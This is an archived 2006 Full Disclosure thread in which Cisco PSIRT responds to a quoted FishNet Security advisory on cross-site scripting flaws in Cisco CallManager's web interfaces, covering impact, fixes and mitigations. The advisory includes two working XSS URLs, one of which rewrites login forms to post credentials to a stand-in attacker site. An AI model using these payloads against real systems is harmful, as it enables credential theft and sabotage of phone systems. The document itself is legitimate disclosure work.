Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Input Validation/Output Encoding Vulnerabilities in Cisco CallManager Allow Script Injection Attacks
From: Clayton Kossmeyer <ckossmey () cisco com>
Date: Mon, 19 Jun 2006 22:37:37 -0400


Hello -

This Cisco Security Response can be viewed on Cisco's website at the
following URL:

http://www.cisco.com/warp/public/707/cisco-sr-20060619-ccmxss.shtml

This is the Cisco PSIRT's response to the statements made by Jake
Reynolds and FishNet Security in his advisory: Input Validation/Output
Encoding Vulnerabilities in Cisco CallManager Allow Script Injection
Attacks. The original email/advisory is available at
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/047015.html.

This issue is being tracked by Cisco Bug ID CSCsb68657. 

We would like to thank Jake Reynolds of FishNet Security for reporting
this issue to us.

We greatly appreciate the opportunity to work with researchers on
security vulnerabilities, and welcome the opportunity to review and
assist in product reports.

Additional Information
----------------------

The attacks described in the report manipulate a Cross Site Scripting
(XSS) weakness in the web interface of the Cisco CallManager. XSS
attacks of this nature rely on intervention of a privileged user and
typically attempt to manipulate or trick such a user into clicking on
an HTTP URL (typically embedded in an email or HTTP web page).

Cisco recommends that users take care when clicking on URLs and
validate the URL being accessed is indeed the site you intend to
browse. Checking the HTML source of a web page or email will reveal
the true destination of a link.

There are no workarounds that will mitigate this vulnerability.

Cisco has fixed this vulnerability and fixes will be forthcoming for
all supported CallManager trains in the following versions:

4.3(1)
4.2(3)
4.1(3)SR4
3.3(5)SR3

Regards,

Clay Seaman-Kossmeyer
Cisco PSIRT


- -------- Original Message --------
Subject: [Full-disclosure] Input Validation/Output Encoding
Vulnerabilities       in Cisco CallManager Allow Script Injection Attacks
Date: Mon, 19 Jun 2006 12:23:52 -0500
From: Reynolds, Jake <Jake.Reynolds () fishnetsecurity com>
To: <full-disclosure () lists grok org uk>

I. SYNOPSIS

Release Date: 07/19/2006

Affected Application: Cisco CallManager 3.1 and up (versions prior to
3.1 were not tested but may
still be vulnerable)

Severity If Exploited: High

Impact: Arbitrary configuration of phone system/Theft of individual
phone users' credentials

Mitigating Factors: Requires user action (following a link, visiting a
resource with an embedded
redirect)

Initial Notification of Vendor: 10/24/2005

Discovery: Jake Reynolds, Senior Security Engineer -- FishNet Security

Contributions: Arian Evans, Senior Security Engineer - FishNet Security

Permanent Advisory Location:
http://www.fishnetsecurity.com/csirt/disclosure/cisco/Cisco+CallManager+XSS+Advisory.htm

II. EXECUTIVE SUMMARY

Vulnerability Overview:

The web interface used to administer Cisco CallManager software suffers
from a lack of input
validation and output encoding. As a result, an attacker could craft a
request that causes the
CallManager web interface to include malicious JavaScript in its
response. If a victim can be made to
submit this specially crafted request, the response will be processed,
and the malicious JavaScript
payload executed in the browser of the victim.

Attack Overview:

If such a request is provided to CallManager administrators (either in
an email or embedded in an html
resource using something like an automatic redirect) an attacker can
perform a variety of nefarious
actions. Depending on the scripted payload, these attacks are commonly
referred to as cross-site
scripting (XSS), session riding, and cross-site request forgery (CSRF).
Potential threats that can be
realized through these vulnerabilities could include but are not limited to:

* Deletion of phone system components such as devices, partitions,
calling search spaces, etc

* Reconfiguration of phone system components such as route plans, global
directory, services, etc

* Theft of global directory user credentials

* Theft of "Cisco CallManager User Options" credentials or session token
leading to user identity
spoofing within that specific interface of CallManager (Utilization of
the stolen credentials or
session tokens would require direct connectivity to CallManager.)

III. TECHNICAL DETAIL

Vulnerability Details:
The web interfaces used to administer Cisco CallManager exhibit input
validation/output encoding
vulnerabilities throughout the applications. Specifically, the "Cisco
CallManager Administration" and
"Cisco CallManager User Options" interfaces contain multiple instances
of these vulnerabilities. This
advisory will focus on a subset of those vulnerabilities that allow
attack execution from an
unauthenticated perspective. Not all vulnerability instances will be
included.

The "Cisco CallManager Administration"
(http://CallManagerAddress/ccmadmin/) web interface contains
parameters that have their user-supplied input returned in subsequent
responses without being properly
encoded. Although this interface requires basic authentication before
access to the vulnerable
parameters is granted, the original request will be sent to the server
after successful
authentication. Thus, reflected script injection is possible if the
attacker can lure a CallManager
administrator into entering their credentials upon being presented with
the basic authentication box.
The URL below takes advantage of the vulnerable "pattern" parameter that
returns user-supplied input
at several points within the subsequent responses.

http://CallManagerAddress/ccmadmin/phonelist.asp?findBy=description&match=begins&pattern=<script>alert
(document.cookie)</script>&submit1=Find&rows=20&wildcards=on&utilityList=

A simple proof of concept script has been written that utilizes XMLHTTP
to search for devices and
delete them from the CallManager configuration. Prior knowledge of the
CallManager configuration would
allow for more savvy attacks that could intelligently reconfigure the
phone system.

The "Cisco CallManager User Options"
(http://CallManagerAddress/ccmuser/) web interface also contains
vulnerable parameters. Most notably, arbitrary parameters included in
requests to /ccmuser/logon.asp
are returned by the application without proper input validation or
output encoding. The URL below
takes advantage of this behavior by appending the parameter
"MadeUpParameter", escaping the form
included in the response, and rewriting all form actions to point to an
attacker site that collects
all input. The application seems to remove the '+' character used to
post-increment the loop counter
so URL hex encoding (%2B) was used to obfuscate it.

http://CallManagerAddress/ccmuser/logon.asp?userID=&password=&MadeUpParameter=";><script>for
(i=0;
i<document.forms.length; i%2B%2B)
document.forms[i].action="http://www.attackersite.com/stealstuff.cgi";;</script><!--

By luring phone system users into making the above request and logging
in, an attacker can steal their
credentials.

IV. MITIGATING FACTORS

Prerequisites: In all cases, there is some prerequisite information that
an attacker must have. The
address of the CallManager is obviously a necessity in order to
correctly craft malicious requests.
This could be easily gained internally by viewing the network
configuration on the IP phones that
register with the targeted CallManager unless the display of this
information has been disabled.
Social engineering could allow an attacker to gain this information from
inside or outside of the
organization. It is important to note that while the address of the
target CallManager is required,
the attacker does not require connectivity. Reflected script injection
attacks only require that the
victim has connectivity to the vulnerable application, since the victim
is the entity that makes the
malicious request, causing unwanted execution of the script included in
the vulnerable server's
response.

Any intelligent reconfiguration of Cisco CallManager using CSRF attacks
as mentioned above would
require knowledge of the current CallManager configuration. However, a
significant amount of damage
could be inflicted by an XMLHTTP-based script that searches for and
deletes all devices without prior
knowledge of the current CallManager configuration.

Exploitation of the "Call Manager User Options" logon page does not
require connectivity to the target
CallManager. However, the use of stolen credentials gained through such
an attack would require
connectivity to a system that utilizes them. This system, in many cases
might only be the CallManager
itself. However, in the case of CallManager integration with another
directory such as iPlanet or
Active directory, credential theft could lead to an attacker gaining
access to many other services.

V. RECOMMENDED ACTIONS

Technical Workarounds:

* Upgrade Software When Fixes Become Available - Cisco has stated that
future releases of all trains
of Cisco CallManager will contain fixes for these vulnerabilities.

* Restrict Network Connectivity to CallManager Interfaces - During
discovery, it was noted that
several organizations had their CallManager administration interfaces
exposed to the Internet. Simple
Google queries are all an attacker needs in this case to obtain the
target CallManager address. There
are few compelling reasons one could present that would justify public
access to CallManager web
interfaces.

* Treat Sensitive/Critical Interfaces as Sensitive & Critical -
Information about the specifics of the
CallManager configuration should be kept confidential. Access to the
various CallManager interfaces
should be as restrictive as possible. Although these attacks do not
require an attacker to have
connectivity to the vulnerable application, restriction of this access
still serves to limit attack
vectors by limiting the amount of potential victims.

Nontechnical Workarounds:

* Education & Awareness of User Luring Attack Vector - Educate all users
about the risks of social
engineering attacks. Users should be aware of the triviality of spoofing
emails, caller ID, and other
types of information.

VI. CONTACT

You can reach the author of this advisory by emailing
jake[dot]reynolds[at]fishnetsecurity.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (Darwin)

iD8DBQFEluHBllAcl+pm5SIRAhUGAKCwlcQrYv3aFudSYK2PiNNeQucRPgCfZIJX
7UGv0l1BV8qVdzdkY85FTMk=
=+w2A
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Re: Input Validation/Output Encoding Vulnerabilities in Cisco CallManager Allow Script Injection Attacks Clayton Kossmeyer (Jun 20)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault